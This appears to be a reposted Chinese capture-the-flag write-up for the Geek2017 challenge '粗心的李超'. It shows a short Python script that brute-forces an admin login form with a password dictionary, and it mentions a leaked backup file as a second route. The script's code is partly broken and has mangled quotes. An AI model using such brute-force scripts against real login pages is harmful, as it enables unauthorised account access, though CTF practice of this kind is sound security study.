分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 网页技术

Geek2017 粗心的李超_writeup——网页表单提交、备份文件泄露

发布时间:2023-09-06 01:17责任编辑:沈小雨关键词:暂无标签

怎么又是web?  EXM?? 我一定是个假的二进制手

假装来看看吧

The first way:弱口令爆破   

网页里只有两个输入框,从源码里能找到name

生成字典,去Python里request爆破吧,脚本如下

 1 # coding:utf-8 2 import requests 3 import time 4 url=‘http://game.sycsec.com:2001‘ 5 f = open("dic.txt","r",encoding="utf-8") 6 # print(len(f.readlines())) 7 for i in range(f.readlines()): 8 ????psd = f.readline().replace("\n","") 9 ????p = {‘user‘: ‘admin‘, ‘pass‘: psd}10 ????print(p)11 ????r = requests.post(url, data=p)12 ????# time.sleep(1)13 ????print(i)14 ????if ‘SYC‘ in r.text:15 ????????print(r.text)16 ????????break

注意要把字典中的\n去掉

另外在爆破过程中可能会蜜汁服务器拒绝响应,从上次断开的点重新开始吧

最后经过撕心裂肺的尝试终于get啦

 The second way:备份文件泄露

 直接能下载备份文件啦,果然是粗心的李超呢

无限春光,尽收眼底

输进去就好啦

另外某大佬说用burpsuite,emmm等我学会了再来填坑吧

Geek2017 粗心的李超_writeup——网页表单提交、备份文件泄露

原文地址:http://www.cnblogs.com/ZHijack/p/7672412.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved